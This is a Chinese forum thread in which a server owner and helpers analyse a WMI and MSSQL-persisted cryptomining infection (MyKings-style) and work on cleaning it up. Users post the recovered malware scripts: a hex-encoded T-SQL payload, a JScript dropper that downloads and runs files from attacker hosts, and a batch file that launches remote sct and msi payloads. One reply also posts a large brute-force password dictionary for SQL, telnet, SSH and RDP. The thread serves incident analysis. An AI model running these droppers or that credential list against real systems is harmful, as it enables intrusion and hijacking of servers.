搜索
12
返回列表 发新帖
楼主: lucifersm
收起左侧

[求助] 服务器中毒,发现可能是通过WMI脚本发作,怎样完全清除

[复制链接]
kaba2017
发表于 2017-9-12 14:20:54 | 显示全部楼层
你现在电脑电脑中毒,你可以到另一台干净的电脑下载镜像杀毒,如果需要留下邮箱我发你自己刻录u盘杀毒启动盘。
kxmp
发表于 2017-9-12 23:19:09 | 显示全部楼层
本帖最后由 kxmp 于 2017-9-12 23:25 编辑
lucifersm 发表于 2017-9-11 14:47
镜像杀毒是什么来的,现在问题是杀毒软件只能检测到攻击和后门的程序,但是把病毒自动下载的脚本程序发现 ...

你把那个劫持都删掉就行了.
wmi那个你把复选框去掉 他就不会启动了 也可以直接删掉.
我看你发上来了wmi脚本 这个做法很明智

我发现url里面有很有趣的信息
这好像是杀进程
rundll32.exe C:\*.exe 0 ntvdm.exe c:\*.exe 0 mskns.exe c:\windows\mskns.exe 0 ntuhost.exe c:\windows\ntuhost.exe 0 wuauser.exe C:\Windows\Prefetch\wuauser.exe 0 lsmose1.exe c:\windows\ngnpyk.exe 0 lsmosee1.exe C:\Windows\security\msiexev.exe 0 svchost64.exe c:\svchost64.exe 0 system64.exe C:\Windows\debug\Arial2\system64.exe 0 lsmosee1.exe c:\windows\debug\lsmosee.exe 0 sychostl.exe C:\Windows\fonts\sychostl.exe 0 wowsiu.exe c:\windows\wowsiu.exe 0 Tnteime.exe c:\windows\fonts\Tnteime.exe 0 gymaye.exe c:\windows\gymaye.exe 0 NsCpuCNMiner64.exe c:\windows\debug\wk\NsCpuCNMiner64.exe 0 mscorsvw.exe c:\windows\debug\wk\mscorsvw.exe 0 mssecsvc.exe c:\windows\mssecsvc.exe 0 ntuhost.exe c:\windows\ntuhost.exe 0 zovpge.exe c:\windows\syswow64\zovpge.exe 0 bivryo.exe c:\windows\bivryo.exe 0 lms.exe c:\windows\fonts\lms.exe 0 uweueq.exe c:\windows\uweueq.exe 0 vutvec.exe c:\windows\system32\vutvec.exe 0 netcore.exe c:\windows\netcore.exe 0 see64.exe C:\Windows\debug\zzx\see64.exe 0 isigos.exe c:\windows\isigos.exe 0

regsvr32 /s shell32.dll
regsvr32 /s WSHom.Ocx
regsvr32 /s scrrun.dll
c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll
regsvr32 /s jscript.dll
scrobj.dll
c:\\windows\\debug\\item.dat

//www.cyg2016.xyz:8888/test.html
http://45.58.133.10:8888/32a.rar c:\windows\help\lsmosee.exe 1
c:\windows\help\lsmosee.exe

对了 你麻烦大了
32a.rar是木马下载器.
我建议你用autoruns仔细看启动项 审查一下

然后我建议你用systemexplorer在线扫描一下 那个是白名单分析 很方便.
autoruns会用的话我觉得都够了

我跑了下那个程序 发现了
lsmose.exe
cudart32_65.dll
lsmos.exe
pthreadVC2.dll
什么cuda库和一个posix相关的东西
难不成你中了挖矿木马之类的?!

我运行了下lsmos.exe
发现了这个
    *** ccminer-cryptonight for nVidia GPUs by tsiv ***
based on ccMiner by Christian Buchner and Christian H.
based on cpuminer-multi by LucasJones
based on pooler-cpuminer 2.3.2 (c) 2010 Jeff Garzik, 2012 pooler
    BTC donation address: 1JHDKp59t1RhHFXsTw2UQpR3F9BBz3R3cs
    DRK donation address: XrHp267JNTVdw5P3dsBpqYfgTpWnzoESPQ
    JPC donation address: Jb9hFeBgakCXvM5u27rTZoYR9j13JGmuc2
    VTC donation address: VwYsZFPb6KMeWuP4voiS9H1kqxcU9kGbsw
    XMR donation address:
      (man these are long... single address, split on two lines)
      42uasNqYPnSaG3TwRtTeVbQ4aRY3n9jY6VXX3mfgerWt4ohD
      QLVaBPv3cYGKDXasTUVuLvhxetcuS16ynt85czQ48mbSrWX
-----------------------------------------------------------------
[2017-09-12 23:21:41] Using JSON-RPC 2.0
C:\Sandbox\KxMP\DefaultBox\drive\E\lsmos.exe: no URL supplied
Try `minerd --help' for more information.
果然证明了我的猜测

你如果删启动项最好留个信息 看看他用的哪个矿池 他收款地址是什么
然后咱们查询下 看看他有多少收入

专业路过
发表于 2017-9-13 10:03:07 | 显示全部楼层
lucifersm 发表于 2017-9-11 09:34
原本的就已经是超过10位的强密码,可能是通过IIS或者sql漏洞进来的?

mysql
root
root root
root 123
root 123456
phpmind phpmind
root admin123
root password
root root123
root 123456*a
mysqld 654321*a

mssql
sa
sa sa
sa 123
sa 123456
sa password
sa 525464
sa shabixuege!@#
vice vice
sa 3xqan7,n`~!@ ~#$%^&*(),.;
sa 4xqan7,m`~!@ ~#$%^&*(),.;
mssqla 4xqan7,n`~!@ ~#$%^&*(),.;
mssqla 4xqan7,m`~!@ ~#$%^&*(),.;
mssqla 3xqan7,mm`~!@ ~#$%^&*(),.;
mssqla 3xqan7,m`~!@ ~#$%^&*(),.;
mssqla 3xqan7,n`~!@ ~#$%^&*(),.;
mssqla 4xqan7,mm`~!@ ~#$%^&*(),.;
sa 4xqbn7,m`~!@ ~#$%^&*(),.;
mssqla 4xqbn7,mm`~!@ ~#$%^&*(),.;
sa 4yqbn7,m`~!@ ~#$%^&*(),.;
mssqla 4yqbn7,mm`~!@ ~#$%^&*(),.;
sa 4yqbm7,m`~!@ ~#$%^&*(),.;
mssqla 4yqbm7,mm`~!@ ~#$%^&*(),.;
kisadmin ypbwkfyjhyhgzj
hbv7 zXJl@mwZ
bwsa bw99588399
ps 740316
uep U_tywg_2008
sa sa123
sa sasa
sa 12345
sa sunshine
sa trustno1
sa 111111
sa iloveyou
sa sql2005
sa DiscoJack
sa 1
401hk 401hk!@#
sa admin@123
sa sa2008
sa 123123
sa 1111
sa 1234
sa 12345678
sa 1234567890
sa passw0wd
sa abc
sa abc123
sa abcdefg
sysdba masterkey
sa bing_1433 xing
sa ^_^$$wanniMaBI:: 1433 vl
sa sapassword
sa linwen5555
su vice_1433 vice
sa Aa123456
sa ABCabc123
sa sqlpassword
sa 1qaz2wsx
sa 1qaz!QAZ
sa sql2008

telnet
!!Huawei @HuaweiHgw
system ping ;sh
root 1001chin
root xc3511
root vizxv
admin admin
5up 5up
root
root jvbzd
root root
root 123
root hg2x0
root 123456
admin admin1234
root admin
superadmin Is$uper@dmin
admin
support support
admin 123456
1234 1234
Admin Admin
admin ho4uku6at
admin 123
admin 1234567
admin 12345
root 12345
admin root
e8telnet e8telnet
telecomadmin nE7jA%5m
e8ehomeasb e8ehomeasb
telnetadmin telnetadmin
e8ehome e8ehome
Zte521 Zte521
root Zte521
user password
admin password
root password
user user
root 888888
root grouter
root 666666
guest 12345
admin ZmqVfoSIP
admin 888888
admin guest
admin 666666
Admin 111111
admin oelinux123
Administrator meinsm
adminlvjh adminlvjh123
default antslq
root telnet
guest admin
netgear netgear
realtek realtek
root 88888888
service service
root cat1029
system system
root oelinux123
root tl789
telnet telnet
root GM8182
user qweasdzx
root hunt5759
root rootpassword
zte zte
root cisco
root telecomadmin
root 12345678
root default
huawei admin@huawei.com
root solokey
root twe8ehome
dvr dvr
supervisor supervisor
root 1234567890
root 0123456789
root rootroot
Manager manager
admin admin888
useradmin useradmin
ubnt ubnt
root dvr
cusadmin highspeed
cisco cisco
admin smcadmin
h3c h3c
admin benq1234
admin 12345678
root PASSWD
root passwd
ROOT PASSWD
huawei huawei
root h3c
root nmgx_wapia
toor toor
Huawei Huawei
admin private
root private

wmi
administrator

ssh
root
root root
root 123
root 123456
root i826y3tz
root password
ubnt ubnt
ubnt admin
root gwevrk7f@qwSX$fd

终端服务

administrator 123
administrator 123456
administrator
administrator 1234
administrator 12345
administrator 5201314
administrator 1qaz2wsx
administrator Aa123456
administrator qwe123!@#
administrator qwe!@#
administrator 123qweqwe
administrator 654321
administrator admin
administrator 0
administrator password
administrator 123123
piress adminlv123
administrator p@ssw0rd
administrator 112233
administrator !@#123
administrator 1qaz2wsx3edc
administrator !@#qwe
administrator zxcvbnm
administrator login
administrator admin123
administrator 3389
administrator pass
lucifersm
 楼主| 发表于 2017-9-13 12:03:49 | 显示全部楼层
本帖最后由 lucifersm 于 2017-9-13 12:09 编辑
kxmp 发表于 2017-9-12 23:19
你把那个劫持都删掉就行了.
wmi那个你把复选框去掉 他就不会启动了 也可以直接删掉.
我看你发上来了wmi ...

不懂怎么留信息,昨天我保存了WMI脚本后就直接删了。。
只保留了之前木马在MSSQL工作里建立的T-SQL脚本和一个找到的bat脚本,你可以看看里面有没有,有部分内容好像和WMI脚本的作用一样,有些好像是修改mssql密码的,剩下的看不懂。
[mw_shl_code=sql,true]@a=0x4445434C4152452040526573756C7420696E743B4445434C415245204046534F5F546F6B656E20696E743B455845432040526573756C74203D2073705F4F4143726561746520277B30443433464530312D463039332D313143462D383934302D3030413043393035343232387D272C204046534F5F546F6B656E204F55545055543B455845432040526573756C74203D2073705F4F414D6574686F64204046534F5F546F6B656E2C202744656C657465466F6C646572272C204E554C4C2C2027633A5C446F63756D656E747320616E642053657474696E67735C44656661756C7420557365725C4C6F63616C2053657474696E67735C54656D706F7261727920496E7465726E65742046696C65735C436F6E74656E742E4945355C2A273B455845432040526573756C74203D2073705F4F414D6574686F64204046534F5F546F6B656E2C202744656C657465466F6C646572272C204E554C4C2C2027633A5C446F63756D656E747320616E642053657474696E67735C4E6574776F726B536572766963655C4C6F63616C2053657474696E67735C54656D706F7261727920496E7465726E65742046696C65735C436F6E74656E742E4945355C2A273B455845432040526573756C74203D2073705F4F414D6574686F64204046534F5F546F6B656E2C202744656C657465466F6C646572272C204E554C4C2C2027633A5C446F63756D656E747320616E642053657474696E67735C4C6F63616C536572766963655C4C6F63616C2053657474696E67735C54656D706F7261727920496E7465726E65742046696C65735C436F6E74656E742E4945355C2A273B455845432040526573756C74203D2073705F4F414D6574686F64204046534F5F546F6B656E2C202744656C657465466F6C646572272C204E554C4C2C2027433A5C57696E646F77735C53797374656D33325C636F6E6669675C73797374656D70726F66696C655C417070446174615C4C6F63616C5C4D6963726F736F66745C57696E646F77735C54656D706F7261727920496E7465726E65742046696C65735C436F6E74656E742E4945355C2A273B455845432040526573756C74203D2073705F4F4144657374726F79204046534F5F546F6B656E;exec(@a);[/mw_shl_code]

他把脚本用了HEX编码,编码部分解码后是这样子
[mw_shl_code=sql,true]DECLARE @Result int;
DECLARE @FSO_Token int;EXEC @Result = sp_OACreate '{0D43FE01-F093-11CF-8940-00A0C9054228}', @FSO_Token OUTPUT;
EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFolder', NULL, 'c:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\*';
EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFolder', NULL, 'c:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\*';
EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFolder', NULL, 'c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\*';
EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFolder', NULL, 'C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\*';
EXEC @Result = sp_OADestroy @FSO_Token[/mw_shl_code]

还有另外几个T-SQL
[mw_shl_code=sql,true]DECLARE @js1 int;EXEC sp_OACreate 'ScriptControl',@js1 OUT;EXEC sp_OASetProperty @js1, 'Language', 'JavaScript1.1';
EXEC sp_OAMethod @js1, 'Eval', NULL, 'var toff=3000;
var url1 = "http://www.cyg2016.xyz:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");
fso = new ActiveXObject("Scripting.FilesystemObject");
wsh = new ActiveXObject("WScript.Shell");
http.open("GET", url1, false);http.send();
str = http.responseText;arr = str.split("\r\n");
for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);
if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };
var locator=new ActiveXObject("WbemScripting.SWbemLocator");
var service=locator.ConnectServer(".","root/cimv2");
var colItems=service.ExecQuery("select * from Win32_Process");
var e=new Enumerator(colItems);var t1=new Date().valueOf();
for(;!e.atEnd();e.moveNext()){var p=e.item();
if(p.Caption=="rundll32.exe")p.Terminate()};
var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");
var url="http://www.cyg2016.xyz:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);
pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");
pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");
pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll");
pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");'[/mw_shl_code]

[mw_shl_code=sql,true]use master;
Drop Procedure xp_cmdshell;
Drop Procedure sp_OAMethod;
Drop Procedure sp_OACreate;
Drop Procedure sp_OASetProperty;
Drop Procedure sp_OADestroy;
Drop Procedure xp_regwrite;
Drop Procedure xp_regdeletevalue;
Drop Procedure xp_regdeletekey;
dbcc addextendedproc ('xp_cmdshell','xplog70.dll');
dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
dbcc addextendedproc ('sp_OACreate','odsole70.dll');
dbcc addextendedproc ('sp_OASetProperty','odsole70.dll');
dbcc addextendedproc ('sp_OADestroy','odsole70.dll');
dbcc addextendedproc ('xp_regwrite','xpstar.dll');
dbcc addextendedproc ('xp_regdeletevalue','xpstar.dll');
dbcc addextendedproc ('xp_regdeletekey','xpstar.dll')[/mw_shl_code]

123.bat的内容
[mw_shl_code=sql,true]@echo off
mode con: cols=13 lines=1
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g system:f&cacls C:\windows\system32\cacls.exe /e /g system:f&cacls C:\windows\system32\cmd.exe /e /g system:f&cacls C:\windows\system32\ftp.exe /e /g system:f&cacls C:\windows\system32\rundll32.exe /e /g everyone:f
taskkill /f /im regsvr32.exe&taskkill /f /im rundll32.exe
regsvr32 /s c:\Progra~1\Common~1\System\Ado\Msado15.dll®svr32 /s jscript.dll®svr32 /s vbscript.dll®svr32 /s scrrun.dll®svr32 /s WSHom.Ocx®svr32 /s shell32.dll
attrib +s +h *.bat
start regsvr32 /u /s /i:http://js.mys2016.info:280/v.sct scrobj.dll
start msiexec.exe /i http://js.mys2016.info:280/helloworld.msi /q
exit[/mw_shl_code]
网址的部分帖子自动加了【url】标签,原本内容是没有的
lucifersm
 楼主| 发表于 2017-9-13 12:42:14 | 显示全部楼层
systemexplorer扫完没发现有问题文件,autoruns发现一些可疑的启动项,但是看不懂是不是有问题,例如这两个,地址写的是在syswow64文件夹,但是打开文件夹里找不到,在下方显示一个system32的位置,在这里能找到这个文件,但是建立日期是2009年的,看上去应该是正常的系统文件
autoruns.jpg
lucifersm
 楼主| 发表于 2017-9-13 12:51:29 | 显示全部楼层

我之前mssql密码是你这里其中一个密码再另外加了特殊字符,可能是这样中招了。。。
kxmp
发表于 2017-9-13 21:20:06 | 显示全部楼层
本帖最后由 kxmp 于 2017-9-13 21:22 编辑
lucifersm 发表于 2017-9-13 12:03
不懂怎么留信息,昨天我保存了WMI脚本后就直接删了。。
只保留了之前木马在MSSQL工作里建立的T-SQL脚本 ...
tsql那个我看他和wmi脚本都一个作用 都会下载文件 然后安装.
里面有个安装包url已经失效了
现在你只能用扫描工具提取些线索.

你研究下dbcc addextendedproc ('xp_cmdshell','xplog70.dll');
dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
dbcc addextendedproc ('sp_OACreate','odsole70.dll');
dbcc addextendedproc ('sp_OASetProperty','odsole70.dll');
dbcc addextendedproc ('sp_OADestroy','odsole70.dll');
dbcc addextendedproc ('xp_regwrite','xpstar.dll');
dbcc addextendedproc ('xp_regdeletevalue','xpstar.dll');
dbcc addextendedproc ('xp_regdeletekey','xpstar.dll')
这里面的dll他正不正常
然后把我上个回帖里面提到的文件名 regsvr开始的那地方
把那些文件都删了
尤其是那个item.dat看他是不是添加了自启动. 是不是在服务里面.

然后systemexplorer扫描一下
结果页面下面有个包含permant这个词的按钮 按了之后这个日志就不会被自动删除
然后你把那个日志url发上来.


wmi必须禁止他启动或者删除
sql那个脚本也必须都删了.  (删之前最好把内容发上来)
否则你这个杀不完 他还会自动下载.
lucifersm
 楼主| 发表于 2017-9-14 14:28:28 | 显示全部楼层
kxmp 发表于 2017-9-13 21:20
tsql那个我看他和wmi脚本都一个作用 都会下载文件 然后安装.
里面有个安装包url已经失效了
现在你只能用 ...

http://zh-cn.systemexplorer.net/ ... mp;sid=bKVd8txSDbuo systemexplorer的日志

你上个回帖里regsvr里的文件除了item.dll外我查过都是系统文件,搜索过C盘所有同名文件建立时间和我另一台同系统的时间一致,应该是正常的文件,item.dll已经被我删掉了。
wmi和sql脚本都删了,sql脚本内容就是我发的那些。删完WMI后没自动下载了,不过可能和我出站端口全封锁和入站端口除了应用要用的端口外所有端口都封掉了有关,我把80和21端口都封了,要不我把80端口开回来,然后用杀毒的全盘监控看看有没有自动下载?
kxmp
发表于 2017-9-14 18:31:46 | 显示全部楼层
本帖最后由 kxmp 于 2017-9-14 18:33 编辑

他下载文件喜欢用乱七八糟端口
反正不是80端口日志上看起来已经够干净了

你确保你乱七八糟密码改强了之后可以开放试试看

乱七八糟补丁能打就打 什么iis php asp乱七八糟的.

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|优惠券| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 苏ICP备07004770号 ) GMT+8, 2017-11-23 10:01 , Processed in 0.042201 second(s), 5 queries , MemCached On.

快速回复 返回顶部 返回列表